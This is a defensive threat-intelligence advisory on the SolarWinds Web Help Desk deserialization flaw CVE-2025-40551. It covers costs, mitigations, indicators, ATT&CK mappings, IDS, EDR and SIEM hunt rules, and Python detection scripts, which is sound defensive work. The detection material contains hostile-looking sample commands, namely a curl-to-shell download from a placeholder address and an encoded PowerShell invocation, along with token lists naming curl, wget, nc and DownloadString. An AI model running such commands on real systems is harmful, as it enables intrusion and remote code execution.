CVE-2025-40551 SolarWinds Web Help Desk Exploitation
BLUF
Unauthenticated remote code execution via deserialization of untrusted data in SolarWinds Web Help Desk, allowing attackers to run commands on the host machine.
Executive Cost Summary
This cost analysis was developed by the CyberDax team using expert judgment and assisted analytical tools to support clarity and consistency.
For organizations affected by active exploitation of CVE-2025-40551 in SolarWinds Web Help Desk:
· Low-end total cost: $700,000 – $1.2M
o (rapid isolation, no lateral movement, limited operational disruption)
· Typical expected range: $1.2M – $2.4M
o (confirmed RCE, full rebuild, moderate investigation and downtime)
· Upper-bound realistic scenarios: $2.4M – $4.0M
o (delayed detection, lateral access, regulatory and customer impact)
Key Cost Drivers
· Time to detection after initial exploitation
· Degree of service account privilege and credential reuse
· Scope of lateral movement from the WHD host
· Regulatory or contractual notification thresholds
· Cyber insurance exclusions tied to patch timeliness
Potential Affected Sectors
· Information Technology
· Enterprise Infrastructure
Potential Affected Countries
· Global
Date of First Reported Activity
· Feb 3, 2026
Date of Last Reported Activity Update
· Feb 3, 2026
CVE-2025-40551
CVSS:3.1
(9.8) AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Nessus ID
· 297225
Is CVE-2025-40551 on the KEV list?
· Yes
What is the CISA patch by date?
· February 6, 2026
URL to patch information
· hxxps://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
Mitigation Steps
· Apply the fixed WHD release referenced in the patch URL above (the vendor release notes for WHD 2026.1); the CISA KEV due date is February 6, 2026.
· Until patched, isolate affected instances from the public internet.
· Restrict network access to the WHD web interface to trusted IP addresses only.
· Run the WHD service under a dedicated low-privilege account so that a successful exploit does not inherit SYSTEM or administrative rights (see Key Cost Drivers above).
Malware names
CVE-2025-40551 does not have malware associated with it at this time.
Malware Family
· No specific named malware family has been publicly attributed yet; primarily results in web shell or remote shell access.
Verdict
· Critical. Malicious exploitation observed in the wild (listed on the CISA KEV catalog).
Primary Objectives
· Initial access
· Remote code execution (RCE)
· Potentially lateral movement within enterprise networks.
APT Names
· There has not been an APT group associated with CVE-2025-40551 at this time.
Associated Criminal Orgs
· There have not been any criminal organizations associated with CVE-2025-40551 at this time.
IOCs
Network-Based Indicators
· Serialized Java Signatures
o Detect requests to the Web Help Desk service whose body or parameters carry the Java serialization stream header: bytes AC ED 00 05 (hex aced0005), which reads as rO0AB when the stream is base64-encoded and as %AC%ED%00%05 when percent-encoded. This only works on cleartext HTTP or where TLS is terminated in front of the sensor.
· Exploit Endpoint Targeting
o Monitor for suspicious requests directed at /helpdesk/WebObjects/Helpdesk.woa/wo/ or the JSONRPC endpoint.
· Whitelist Bypass Attempts
o Look for request parameters containing the string /ajax/, which may indicate attempts to bypass security sanitization.
· Anomalous IPs
o High-frequency requests from unknown or unexpected IP addresses targeting these specific application paths.
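As an added example (not code from this page, from Horizon3 or from SolarWinds), the following Python scores a single HTTP request against the network indicators above. The /Helpdesk.woa/wo/ path, the /ajax/ query token, the aced0005 header and the ajaxproxy/jsonrpc/jabsorb path tokens come from this page; the sample requests, the "data" and "params" parameter names and the AjaxProxy URL used in the samples are constructed for illustration. It goes beyond the hex form by also catching the header when it is percent-encoded or sits inside a base64 blob in a JSON body, which is how it usually travels.

```python
"""Score HTTP requests against the WHD network indicators (added example)."""
import base64
import re
from urllib.parse import unquote, unquote_to_bytes, urlsplit

JAVA_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC 0xACED + STREAM_VERSION 5
JAVA_MAGIC_HEX = b"aced0005"       # hex-string form of the same header
JAVA_MAGIC_B64 = b"rO0AB"          # base64 of the header when it begins a chunk
TARGET_PATH = "/helpdesk.woa/wo/"  # lower-cased substring of the indicator path
RPC_TOKENS = re.compile(r"ajaxproxy|jsonrpc|jabsorb", re.IGNORECASE)
B64_TOKEN = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def has_java_stream(body: bytes) -> bool:
    """True if the body carries a Java serialization header in raw,
    percent-encoded, hex or base64 form. Base64 blobs are decoded because the
    header only reads as 'rO0AB' when it starts a base64 chunk; at any other
    offset the encoded text looks unrelated."""
    views = (body, unquote_to_bytes(body))
    for view in views:
        if JAVA_MAGIC in view or JAVA_MAGIC_B64 in view or JAVA_MAGIC_HEX in view.lower():
            return True
    for tok in B64_TOKEN.findall(views[1]):
        try:
            blob = base64.b64decode(tok + b"=" * (-len(tok) % 4))
        except ValueError:  # binascii.Error is a ValueError: not real base64
            continue
        if JAVA_MAGIC in blob:
            return True
    return False


def score_request(url: str, body: bytes = b"") -> list[str]:
    """Return the indicator names this request matches, in a fixed order."""
    parts = urlsplit(url)
    path = unquote(parts.path).lower()
    query = unquote(parts.query).lower()   # decode %2Fajax%2F before testing
    hits = []
    if TARGET_PATH in path:
        hits.append("exploit_endpoint")
    if "/ajax/" in query:
        hits.append("whitelist_bypass")
    if RPC_TOKENS.search(path):
        hits.append("jsonrpc_endpoint")
    if has_java_stream(body):
        hits.append("serialized_java")
    return hits


# Constructed sample traffic (not captured data): a benign login, a
# whitelist-bypass probe, a percent-encoded raw stream, and a JSON-RPC style
# body whose base64 blob hides the header at a non-zero offset.
_blob = base64.b64encode(b"\x00" + JAVA_MAGIC + b"sr\x00\x11java.util.HashMap")
SAMPLE_REQUESTS = [
    ("/helpdesk/WebObjects/Helpdesk.woa/wa/Login", b"username=alice"),
    ("/helpdesk/WebObjects/Helpdesk.woa/wo/1?arg=%2Fajax%2Fx", b""),
    ("/helpdesk/WebObjects/Helpdesk.woa/wo/1", b"data=%AC%ED%00%05sr"),
    ("/helpdesk/WebObjects/Helpdesk.woa/wo/AjaxProxy", b'{"params":["' + _blob + b'"]}'),
]

if __name__ == "__main__":
    for url, body in SAMPLE_REQUESTS:
        print(url, "->", score_request(url, body) or "clean")
```

Feed it parsed requests from a TLS-terminating proxy or WAF log; a request that matches both an endpoint indicator and serialized_java is the one to page on.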
Host-Based Indicators
· Suspicious Child Processes
o Monitor for unexpected child processes spawned by the Web Help Desk Java process (e.g., cmd.exe, powershell.exe, bash, sh).
· Service Account Activity
o Audit any system-level commands or shell executions originating directly from the Web Help Desk service account.
· Anomalous File Modifications
o Unexpected file creation or changes within Web Help Desk installation directories, specifically the /log/ or /logs/ folders.
· Log Entries
o Check WHD logs for frequent JSONRPC errors or payloads that fail the application's internal whitelist.
Tools used
· Opportunistic automated scanners
· Custom deserialization payload generators
TTPs
· T1190 Exploit Public-Facing Application
o This is the primary Initial Access technique. Attackers target the AjaxProxy functionality in internet-exposed WHD instances.
· T1203 Exploitation for Client Execution
o Listed for the deserialization step, but note that T1203 covers client-side applications; the server-side insecure deserialization in WHD is part of the T1190 exploitation above. The mechanism: the application processes an attacker-supplied serialized Java object, often delivered via crafted JSON-RPC requests, and code runs during deserialization.
· T1059 Command and Scripting Interpreter
o Following successful deserialization, the attacker executes arbitrary commands (e.g., via PowerShell or bash) to gain full control of the host machine.
· T1548.002 Abuse Elevation Control Mechanism (Bypass User Account Control)
o Mapped for the privilege outcome, but no UAC bypass is involved: the attacker inherits the privileges of the WHD service account, which often runs as SYSTEM or a high-privilege administrative user, so no separate escalation step is needed.
· T1136 Create Account
o Post-exploitation activity frequently includes creating new administrative accounts to maintain persistent access.
Suggested rules / potential hunts
Suricata
Suricata reads each rule as one logical line; the rules below are wrapped across lines for readability. They only see cleartext HTTP or traffic decrypted by a TLS-terminating proxy in front of the sensor.
· WHD whitelist bypass probing (/ajax/ in query)
o Horizon3 explicitly identifies /Helpdesk.woa/wo/* with "/ajax/" in query parameters as a whitelist bypass indicator.
alert http $EXTERNAL_NET any -> $HOME_NET any ( \
    msg:"CVE-2025-40551 SolarWinds WHD probe - Helpdesk.woa with ajax in query"; \
    flow:established,to_server; \
    http.uri; content:"/Helpdesk.woa/wo/"; nocase; \
    http.uri; content:"/ajax/"; nocase; \
    classtype:web-application-attack; \
    reference:cve,2025-40551; \
    sid:4055101; rev:1; \
)
· AjaxProxy / JSON-RPC targeting (legitimate WHD clients also use these endpoints, so treat hits as hunting context rather than a blocking signal)
alert http $EXTERNAL_NET any -> $HOME_NET any ( \
    msg:"CVE-2025-40551 SolarWinds WHD AjaxProxy or JSON-RPC access"; \
    flow:established,to_server; \
    http.uri; pcre:"/(ajaxproxy|jsonrpc|jabsorb)/i"; \
    classtype:web-application-attack; \
    reference:cve,2025-40551; \
    sid:4055102; rev:1; \
)
· JSONRPCBridge exception leakage (post-attempt)
alert http $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"CVE-2025-40551 SolarWinds WHD JSONRPCBridge error response"; \
    flow:established,to_client; \
    http.response_body; content:"org.jabsorb.JSONRPCBridge"; nocase; \
    classtype:web-application-attack; \
    reference:cve,2025-40551; \
    sid:4055103; rev:1; \
)
High-Confidence Suricata Correlation
Alert if:
Rule 4055101 OR 4055102
followed within 5 minutes by 4055103
Same src_ip → same dest_ip
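The correlation above, implemented over Suricata EVE JSON alerts as an added example (not code from this page or from the Suricata project). It assumes EVE alert records carry the src_ip/dest_ip of the triggering packet, so the response-side alert (sid 4055103) has the WHD server as src_ip and the attacker as dest_ip; the key is normalised to (client, server) before matching, which is what "same src_ip → same dest_ip" has to mean once the direction flips. The alert records are constructed; the sids and the 5-minute window are the page's.

```python
"""Correlate Suricata EVE alerts for the CVE-2025-40551 rule set (added example)."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Optional

PROBE_SIDS = {4055101, 4055102}   # request-side rules: client -> WHD
RESPONSE_SID = 4055103            # response-side rule: WHD -> client
WINDOW = timedelta(minutes=5)


def parse_ts(ts: str) -> datetime:
    """EVE timestamps look like 2026-02-03T10:15:04.123456+0000."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def correlate(alerts: list, window: Optional[timedelta] = None) -> list:
    """Return one hit per (client, server) pair where a probe alert was followed
    within `window` by the JSONRPCBridge error alert for the same pair."""
    window = window or WINDOW
    probes = defaultdict(list)          # (client, server) -> [(ts, sid)]
    hits = []
    for a in sorted(alerts, key=lambda x: parse_ts(x["timestamp"])):
        sid = a["alert"]["signature_id"]
        ts = parse_ts(a["timestamp"])
        if sid in PROBE_SIDS:
            probes[(a["src_ip"], a["dest_ip"])].append((ts, sid))
        elif sid == RESPONSE_SID:
            # Response packet: the server is src_ip, the attacker is dest_ip.
            client, server = a["dest_ip"], a["src_ip"]
            for pts, psid in probes[(client, server)]:
                if timedelta(0) <= ts - pts <= window:
                    hits.append({"client": client, "server": server,
                                 "probe_sid": psid,
                                 "delta_s": (ts - pts).total_seconds()})
                    break
    return hits


def _alert(ts: str, src: str, dst: str, sid: int) -> dict:
    """Minimal EVE-shaped alert record (constructed, not captured)."""
    return {"timestamp": ts, "event_type": "alert", "src_ip": src,
            "dest_ip": dst, "alert": {"signature_id": sid}}


# Constructed sample: one true sequence (probe then error within 5 s), one
# probe with no error, and one probe/error pair 10 minutes apart (outside window).
SAMPLE_ALERTS = [
    _alert("2026-02-03T10:15:04.000000+0000", "203.0.113.7", "10.0.0.5", 4055101),
    _alert("2026-02-03T10:15:09.000000+0000", "10.0.0.5", "203.0.113.7", 4055103),
    _alert("2026-02-03T10:20:00.000000+0000", "198.51.100.9", "10.0.0.5", 4055102),
    _alert("2026-02-03T10:50:00.000000+0000", "192.0.2.44", "10.0.0.5", 4055101),
    _alert("2026-02-03T11:00:00.000000+0000", "10.0.0.5", "192.0.2.44", 4055103),
]

if __name__ == "__main__":
    for hit in correlate(SAMPLE_ALERTS):
        print(hit)
```

Point it at `eve.json` filtered to `event_type == "alert"`; in a SIEM the same logic is a sequence rule keyed on the normalised pair.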
SentinelOne (the queries below use a generic EDR field schema; map ParentProcessName, ProcessName, ProcessCommandLine, InitiatingProcessName and FilePath to the field names of your console before use, and confirm the image name of the WHD Java process on your hosts)
· Java (WHD) spawning a shell (Windows)
EventType = "Process Creation"
AND ParentProcessName CONTAINS "java"
AND (
ProcessName = "cmd.exe"
OR ProcessName = "powershell.exe"
OR ProcessName = "pwsh.exe"
OR ProcessName = "mshta.exe"
OR ProcessName = "rundll32.exe"
)
Escalate if command line contains:
ProcessCommandLine CONTAINS "-enc"
OR ProcessCommandLine CONTAINS "IEX"
OR ProcessCommandLine CONTAINS "DownloadString"
· Java spawning shell (Linux)
EventType = "Process Creation"
AND ParentProcessName = "java"
AND (
ProcessName = "sh"
OR ProcessName = "bash"
OR ProcessName = "dash"
)
Escalate if command line contains:
ProcessCommandLine CONTAINS "curl"
OR ProcessCommandLine CONTAINS "wget"
OR ProcessCommandLine CONTAINS "nc "
· WebHelpDesk Java writing executable files
EventType = "File Creation"
AND InitiatingProcessName = "java"
AND (
FilePath CONTAINS "/webhelpdesk"
OR FilePath CONTAINS "/tomcat"
OR FilePath CONTAINS "/tmp"
)
AND (
FileExtension = "jsp"
OR FileExtension = "jar"
OR FileExtension = "war"
OR FileExtension = "sh"
OR FileExtension = "ps1"
)
· Network egress from WHD server
EventType = "Network Connection"
AND InitiatingProcessName = "java"
AND Direction = "Outbound"
AND NOT DestinationIP IN (Known_Internal_Ranges)
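The process-creation logic of the two "Java spawning a shell" queries above, run over sample EDR events as an added example (not code from this page or from SentinelOne). The shell names and the escalation tokens are the page's; the event field names (host, parent_name, parent_cmdline, name, cmdline) are an assumed schema and the events themselves are constructed.

```python
"""Classify EDR process-creation events from a WHD host (added example)."""
from typing import Optional

WINDOWS_SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe"}
LINUX_SHELLS = {"sh", "bash", "dash"}
WINDOWS_ESCALATE = ("-enc", "iex", "downloadstring")   # short tokens: noisy on purpose
LINUX_ESCALATE = ("curl", "wget", "nc ")


def is_whd_java(parent_name: str, parent_cmdline: str) -> bool:
    """The WHD service is a Java process; match on the image name or on the
    install path / service name appearing in the parent command line."""
    return "java" in parent_name.lower() or "webhelpdesk" in parent_cmdline.lower()


def classify(event: dict) -> Optional[str]:
    """Return 'high' (shell plus download/encoded payload), 'medium' (shell only)
    or None for one process-creation event. Names are compared case-insensitively
    because Windows EDRs report PowerShell.exe and powershell.exe interchangeably."""
    if not is_whd_java(event["parent_name"], event.get("parent_cmdline", "")):
        return None
    name = event["name"].lower()
    cmd = event.get("cmdline", "").lower()
    if name in WINDOWS_SHELLS:
        return "high" if any(tok in cmd for tok in WINDOWS_ESCALATE) else "medium"
    if name in LINUX_SHELLS:
        return "high" if any(tok in cmd for tok in LINUX_ESCALATE) else "medium"
    return None


def triage(events: list) -> list:
    """(host, child process, severity) for every event worth a ticket."""
    out = []
    for e in events:
        sev = classify(e)
        if sev:
            out.append((e["host"], e["name"], sev))
    return out


# Constructed events (not real telemetry): encoded PowerShell, a plain shell,
# a curl-to-shell download, a non-Java parent, and a benign Java child.
SAMPLE_EVENTS = [
    {"host": "whd-01", "parent_name": "java.exe", "parent_cmdline": r"C:\Program Files\WebHelpDesk\...",
     "name": "PowerShell.exe", "cmdline": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"host": "whd-02", "parent_name": "java", "parent_cmdline": "/usr/local/webhelpdesk/bin/java",
     "name": "sh", "cmdline": "sh -c id"},
    {"host": "whd-02", "parent_name": "java", "parent_cmdline": "/usr/local/webhelpdesk/bin/java",
     "name": "bash", "cmdline": "bash -c 'curl http://198.51.100.9/x | sh'"},
    {"host": "ws-17", "parent_name": "explorer.exe", "parent_cmdline": "explorer.exe",
     "name": "cmd.exe", "cmdline": "cmd.exe /c dir"},
    {"host": "whd-02", "parent_name": "java", "parent_cmdline": "/usr/local/webhelpdesk/bin/java",
     "name": "ps", "cmdline": "ps -ef"},
]

if __name__ == "__main__":
    for row in triage(SAMPLE_EVENTS):
        print(row)
```

A 'medium' from a WHD host still warrants a look, since the service has no business spawning an interactive shell at all; 'high' is the page-on-call condition.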
Splunk
· /Helpdesk.woa/wo/ + /ajax/ in query (the original anchored the path at the start, which never matches the real /helpdesk/WebObjects/Helpdesk.woa/wo/ prefix, and used like(), which is an eval function and not valid inside the search command)
index=web OR index=proxy
uri="*/Helpdesk.woa/wo/*"
(uri="*/ajax/*" OR uri="*%2Fajax%2F*" OR query_string="*/ajax/*")
| stats count min(_time) as firstSeen max(_time) as lastSeen
values(user_agent) as userAgents
values(status) as statusCodes
by src_ip dest_ip http_host uri
| sort - count
· JSONRPCBridge errors (strong exploit signal)
index=app OR index=solarwinds
("org.jabsorb.JSONRPCBridge" OR "AjaxProxy" OR "JSONRPC")
| stats count min(_time) as firstSeen max(_time) as lastSeen
values(source) as sources
by host
| sort - count
· Default client account usage
index=app OR index=solarwinds
(eventType="login" OR message="*login*")
username="client"
| stats count min(_time) as firstSeen max(_time) as lastSeen
values(src_ip) as srcIPs
by host
· Java spawning shells (EDR ingested logs)
index=edr OR index=oswin OR index=osnix
(parent_process_name="java*" OR parent_command_line="*WebHelpDesk*")
(process_name IN ("cmd.exe","powershell.exe","sh","bash","curl","wget"))
| stats count min(_time) as firstSeen max(_time) as lastSeen
values(process_command_line) as cmdlines
by host user parent_process_name process_name
| sort - count
· Correlated Splunk Detection (Recommended)
Web and proxy events name the WHD server in dest/http_host while EDR and application events name it in host, so the three sources are normalised onto one field before transaction groups them; the mvcount check requires evidence from at least two different sources, not two events from one.
(index=web uri="*/Helpdesk.woa/wo/*" uri="*/ajax/*")
OR (index=app "org.jabsorb.JSONRPCBridge")
OR (index=edr parent_process_name="java*" process_name IN ("cmd.exe","powershell.exe","sh","bash"))
| eval whd_host=coalesce(http_host, dest, host)
| eval evidence=index
| transaction whd_host maxspan=10m
| where eventcount >= 2 AND mvcount(evidence) >= 2
SOC Triage Guidance (Important)
Treat as FULL COMPROMISE when a network indicator is followed by host activity on the same WHD server:
· /Helpdesk.woa/wo/* + /ajax/ requests (on its own this is an attempt)
· JSONRPCBridge errors in responses or logs (an attempt reached the JSON-RPC layer)
· Java spawning a shell (code execution confirmed)
· Outbound beaconing from the Java process (attacker has control)
Immediate actions
Isolate WHD host
Credential reset (WHD + OS)
Search for JSP/webshells
Review scheduled tasks / cron
References
Documentation Solarwinds
· hxxps://documentation.solarwinds.com/en/success_center/whd/content/release_notes/whd_2026-1_release_notes.htm
CISA KEV Catalog
· hxxps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-40551
NVD
· hxxps://nvd.nist.gov/vuln/detail/CVE-2025-40551
Tenable
· hxxps://www.tenable.com/cve/CVE-2025-40551/plugins